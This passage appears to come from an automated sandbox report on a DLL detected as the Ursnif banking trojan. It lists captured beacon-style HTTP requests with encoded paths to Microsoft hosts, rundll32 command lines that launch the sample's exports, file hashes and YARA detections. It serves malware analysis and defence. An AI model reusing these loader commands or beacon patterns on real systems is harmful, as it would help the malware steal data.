2021-10-11 22:38:53 UTC | 9 | OUT | GET /signup/liopolo/rNcthdwaMuA/zHzDKpXzKq0_2F/hgSdOtaWvkDNGgYpqBLqh/fnirw5AL03xUm4gv/1SKDwhrC85cQhDG/iqhTJ3hi9wsaeKx0vI/xO4E5YLZP/YP9uSugvYABSkowPk9S_/2B24KB1lGZ7pVE71wAB/PNLOy1DTAkJRmo3faOVpWQ/D9BP51I5FAmCi/mjxkDJSf_2B0/dO3cuvbU.jre HTTP/1.1
  Cache-Control: no-cache
  Connection: Keep-Alive
  Pragma: no-cache
  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
  Host: outlook.office365.com
2021-10-11 22:38:53 UTC | 9 | IN | HTTP/1.1 404 Not Found
  Content-Length: 1245
  Content-Type: text/html
  Server: Microsoft-IIS/10.0
  request-id: 463ae588-6705-a5a4-dc70-c20dde540b89
  Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
  X-CalculatedFETarget: HE1PR0202CU001.internal.outlook.com
  X-BackEndHttpStatus: 404
  X-FEProxyInfo: HE1PR0202CA0016.EURPRD02.PROD.OUTLOOK.COM
  X-CalculatedBETarget: HE1P194MB0201.EURP194.PROD.OUTLOOK.COM
  X-BackEndHttpStatus: 404
  X-RUM-Validated: 1
  X-Proxy-RoutingCorrectness: 1
  X-Proxy-BackendServerStatus: 404
  MS-CV: iOU6RgVnpKXccMIN3lQLiQ.1.1
  X-FEServer: HE1PR0202CA0016
  X-Powered-By: ASP.NET
  X-FEServer: AM6P194CA0062
  Date: Mon, 11 Oct 2021 22:38:53 GMT
  Connection: close
2021-10-11 22:38:53 UTC | 10 | IN | Data (ASCII): <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404 - Fil


Session ID: 8 | Source IP: 192.168.2.4 | Source Port: 49827 | Destination IP: 13.82.28.61 | Destination Port: 443 | Process: C:\Windows\System32\loaddll32.exe
Timestamp | kBytes transferred | Direction | Data
2021-10-11 22:39:27 UTC | 11 | OUT | GET /mail/liopolo/5hHdOh6aVGIiN/xm3v7_2B/EkShunhzAo7MsZ9CmkqFWtX/3z_2Bns4ON/91CWMsZkh9K0L_2FK/DGWBtSEwajEJ/0TtpREbudd5/QgJK102N2T9j48/a7_2B8h2NmEQ_2FO6HINr/eS5x2dWmrnxEuUas/E6VYZyoESNredc4/JUFmKkMiSye_2BBKeH/JexZCfmhU/vSKjW_2B8KOY/RYzBQt1.jre HTTP/1.1
  Cache-Control: no-cache
  Connection: Keep-Alive
  Pragma: no-cache
  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
  Host: msn.com
2021-10-11 22:39:27 UTC | 12 | IN | HTTP/1.1 301 Moved Permanently
  Content-Type: text/html; charset=UTF-8
  Location: https://www.msn.com/mail/liopolo/5hHdOh6aVGIiN/xm3v7_2B/EkShunhzAo7MsZ9CmkqFWtX/3z_2Bns4ON/91CWMsZkh9K0L_2FK/DGWBtSEwajEJ/0TtpREbudd5/QgJK102N2T9j48/a7_2B8h2NmEQ_2FO6HINr/eS5x2dWmrnxEuUas/E6VYZyoESNredc4/JUFmKkMiSye_2BBKeH/JexZCfmhU/vSKjW_2B8KOY/RYzBQt1.jre
  Server: Microsoft-IIS/8.5
  X-Powered-By: ASP.NET
  Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
  Date: Mon, 11 Oct 2021 22:39:26 GMT
  Connection: close
  Content-Length: 380
2021-10-11 22:39:27 UTC | 12 | IN | Data (ASCII): <head><title>Document Moved</title></head><body><h1>Object Moved</h1>This document may be found <a HREF="https://www.msn.com/mail/liopolo/5hHdOh6aVGIiN/xm3v7_2B/EkShunhzAo7MsZ9CmkqFWtX/3z_2Bns4ON/91CWMsZkh9K0L_2FK/DGWBtSEwajEJ/0TtpREbudd5/QgJK102N2T9j48/


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                        9192.168.2.44982913.82.28.61443C:\Windows\System32\loaddll32.exe
                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                        2021-10-11 22:39:34 UTC12OUTGET /mail/liopolo/QoeEw7znNY9KuZLPv/PhlDvAFg0Bnn/nVx6DnTynJS/Jqe2AOjRD8vYJs/PuqBLIn3Zd37OXyJlwD7Q/FiLhjKnVW_2ByswX/LXphFosRYtREZOL/Q6wDOp8ES889SSlI1S/AFbHRrWLn/_2F7R_2FVhgDELEonTCy/KSLPzpnW0YF_2FoB4Xy/kHR_2F88KI6KqxU9hJvbKE/it_2FLM35/c.jre HTTP/1.1
                                                                                                                        Cache-Control: no-cache
                                                                                                                        Connection: Keep-Alive
                                                                                                                        Pragma: no-cache
                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                                                                                                                        Host: msn.com
Timestamp: 2021-10-11 22:39:34 UTC
kBytes transferred: 13
Direction: IN
Data:
HTTP/1.1 301 Moved Permanently
Content-Type: text/html; charset=UTF-8
Location: https://www.msn.com/mail/liopolo/QoeEw7znNY9KuZLPv/PhlDvAFg0Bnn/nVx6DnTynJS/Jqe2AOjRD8vYJs/PuqBLIn3Zd37OXyJlwD7Q/FiLhjKnVW_2ByswX/LXphFosRYtREZOL/Q6wDOp8ES889SSlI1S/AFbHRrWLn/_2F7R_2FVhgDELEonTCy/KSLPzpnW0YF_2FoB4Xy/kHR_2F88KI6KqxU9hJvbKE/it_2FLM35/c.jre
Server: Microsoft-IIS/8.5
X-Powered-By: ASP.NET
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Date: Mon, 11 Oct 2021 22:39:33 GMT
Connection: close
Content-Length: 377
Timestamp: 2021-10-11 22:39:34 UTC
kBytes transferred: 13
Direction: IN
Data Ascii: <head><title>Document Moved</title></head><body><h1>Object Moved</h1>This document may be found <a HREF="https://www.msn.com/mail/liopolo/QoeEw7znNY9KuZLPv/PhlDvAFg0Bnn/nVx6DnTynJS/Jqe2AOjRD8vYJs/PuqBLIn3Zd37OXyJlwD7Q/FiLhjKnVW_2ByswX/LXphFosRYtREZOL/Q6w


                                                                                                                        Code Manipulations

                                                                                                                        Statistics

                                                                                                                        Behavior


                                                                                                                        System Behavior

                                                                                                                        General

Start time: 00:36:03
Start date: 12/10/2021
Path: C:\Windows\System32\loaddll32.exe
Wow64 process (32bit): true
Commandline: loaddll32.exe 'C:\Users\user\Desktop\616412739e268.dll'
Imagebase: 0xd40000
File size: 893440 bytes
MD5 hash: 72FCD8FB0ADC38ED9050569AD673650E
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
                                                                                                                        Yara matches:
                                                                                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.916793229.0000000003BB8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.916426520.0000000003BB8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.916847995.0000000003BB8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.916379765.0000000003BB8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.1049081119.000000000383F000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.916579363.0000000003BB8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.960454814.0000000003A3B000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.917263832.0000000003BB8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000002.1185910848.00000000037C0000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.916716758.0000000003BB8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                        • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000000.00000003.859623257.0000000001390000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.916652805.0000000003BB8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.1006058312.000000000393D000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.916501324.0000000003BB8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                        • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000000.00000002.1185750269.0000000003559000.00000004.00000040.sdmp, Author: Joe Security
Reputation: moderate

                                                                                                                        General

Start time: 00:36:04
Start date: 12/10/2021
Path: C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit): true
Commandline: cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\616412739e268.dll',#1
Imagebase: 0x11d0000
File size: 232960 bytes
MD5 hash: F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

                                                                                                                        General

Start time: 00:36:04
Start date: 12/10/2021
Path: C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit): true
Commandline: rundll32.exe C:\Users\user\Desktop\616412739e268.dll,BeGrass
Imagebase: 0x910000
File size: 61952 bytes
MD5 hash: D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
                                                                                                                        Yara matches:
                                                                                                                        • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000002.00000003.815784536.0000000003220000.00000040.00000001.sdmp, Author: Joe Security
Reputation: high

                                                                                                                        General

Start time: 00:36:04
Start date: 12/10/2021
Path: C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit): true
Commandline: rundll32.exe 'C:\Users\user\Desktop\616412739e268.dll',#1
Imagebase: 0x910000
File size: 61952 bytes
MD5 hash: D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
                                                                                                                        Yara matches:
                                                                                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.974874720.000000000573B000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000002.1187092392.00000000054C0000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.930983342.00000000058B8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.930624015.00000000058B8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.1020193164.000000000563D000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.930910657.00000000058B8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.931064048.00000000058B8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                        • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000003.00000003.817641494.0000000003420000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.930863354.00000000058B8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.1063376109.000000000553F000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.931519942.00000000058B8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.931136929.00000000058B8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.930715901.00000000058B8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                        • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000003.00000002.1186977706.0000000005229000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.930775995.00000000058B8000.00000004.00000040.sdmp, Author: Joe Security
Reputation: high

                                                                                                                        General

Start time: 00:36:09
Start date: 12/10/2021
Path: C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit): true
Commandline: rundll32.exe C:\Users\user\Desktop\616412739e268.dll,Fieldeight
Imagebase: 0x910000
File size: 61952 bytes
MD5 hash: D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
                                                                                                                        Yara matches:
                                                                                                                        • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000004.00000003.843034391.00000000008A0000.00000040.00000001.sdmp, Author: Joe Security
Reputation: high

                                                                                                                        General

Start time: 00:36:17
Start date: 12/10/2021
Path: C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit): true
Commandline: rundll32.exe C:\Users\user\Desktop\616412739e268.dll,Often
Imagebase: 0x910000
File size: 61952 bytes
MD5 hash: D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
                                                                                                                        Yara matches:
                                                                                                                        • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000005.00000003.855981301.0000000002EC0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                        • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000005.00000003.888775678.0000000004D09000.00000004.00000040.sdmp, Author: Joe Security
Reputation: high

                                                                                                                        General

Start time: 00:37:46
Start date: 12/10/2021
Path: C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit): true
Commandline: C:\Windows\SysWOW64\WerFault.exe -u -p 7072 -s 636
Imagebase: 0x10e0000
File size: 434592 bytes
MD5 hash: 9E2B8ACAD48ECCA55C0230D63623661B
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language

                                                                                                                        General

Start time: 00:37:51
Start date: 12/10/2021
Path: C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit): true
Commandline: C:\Windows\SysWOW64\WerFault.exe -u -p 1364 -s 644
Imagebase: 0x10e0000
File size: 434592 bytes
MD5 hash: 9E2B8ACAD48ECCA55C0230D63623661B
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language

                                                                                                                        General

Start time: 00:37:56
Start date: 12/10/2021
Path: C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit): true
Commandline: C:\Windows\SysWOW64\WerFault.exe -u -p 6464 -s 632
Imagebase: 0x10e0000
File size: 434592 bytes
MD5 hash: 9E2B8ACAD48ECCA55C0230D63623661B
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language

                                                                                                                        Disassembly

                                                                                                                        Code Analysis
